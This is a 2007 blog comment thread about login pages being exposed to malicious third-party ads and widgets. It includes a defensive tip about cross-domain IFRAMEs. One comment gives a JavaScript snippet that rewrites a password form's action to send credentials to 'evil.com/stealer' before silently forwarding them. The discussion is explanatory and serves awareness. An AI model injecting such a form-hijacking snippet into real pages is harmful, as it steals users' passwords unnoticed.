Comments on: Login page security issues

By: whooknew

whooknew — Mon, 04 Jun 2007 05:12:56 +0000

Just 10 minutes ago I was asking a friend about the security ramifications of widgets. He pointed me to your blog immediately. I’m not a programmer but I do know there are more people who use javascript/widgets that don’t understand code than those that do.

As most of us (non-programmers) just copy code and stick it into templates, I can foresee a very ugly phenomenon. Imagine an army of nasty widgets that collect different pieces of random information and another brain program that puts the info back together. I don’t what could happen, but I’m sure it is not a good thing.

This could lead to very damaging software as the exponential viral effects are tremendous. I would assume that in the future widgets will be able to play with other widgets and thus several independent programs may run on the browser simultaneously. Maybe I don’t know what I’m talking about, but it seems possible.

Thoughts?

By: 3543244

3543244 — Fri, 01 Jun 2007 17:06:44 +0000

As far as the other ways “the smarter guys out there” could do it, my JS would be more like:

document.getElementById(‘passform’).action=
‘http://www.evil.com/stealer?goto='+
escape(document.getElementById(‘passform’).action);

Where that “stealer” would record the submitted information and either invisibly redirect (for a GET form), or write out an invisible document with some javascript to submit it to the original location.

Only the closest observation would catch it. Especially if the name is more innocuous than “evil.com/stealer”.

By: David Weinstein

David Weinstein — Fri, 01 Jun 2007 15:48:14 +0000

Another way to protect yourself from this sort of attack as a publisher is to only serve IFRAME ads (never javascript) and ensure that the domain serving the IFRAME content is different that the domain of the site where the ad is appearing. If you do this, you’ll always be safe from XSS attacks served via ads, since the browser’s security model will not let javascript in the child IFRAME from reading anything in the DOM on the parent when the domains don’t match.

As a sidenote: the insidious thing about XSS attacks served anonymously via an adserver is that there’s almost no way for the victim publisher to know that something like this is taking place. It’s a silent but deadly attack and it’s therefore very hard to get a handle on the scope of the problem.

By: yardley.ca / dash » Trust

yardley.ca / dash » Trust — Fri, 01 Jun 2007 13:04:59 +0000

[...] released a little demo that illustrates how an advertisement (or a widget, for that matter) provided by a third-party [...]

By: Mike

Mike — Fri, 01 Jun 2007 12:18:20 +0000

Seems I should do some cross-browser testing .

Works in Firefox right now, and I’m sure I can get it to work in IE as well, might just need to do a bit of tweaking.

By: Sandi Hardmeier

Sandi Hardmeier — Fri, 01 Jun 2007 10:50:20 +0000

It didn’t work for me – the results in the popup were:

“I just stole your info, your username = undefined and your pass is Submit password”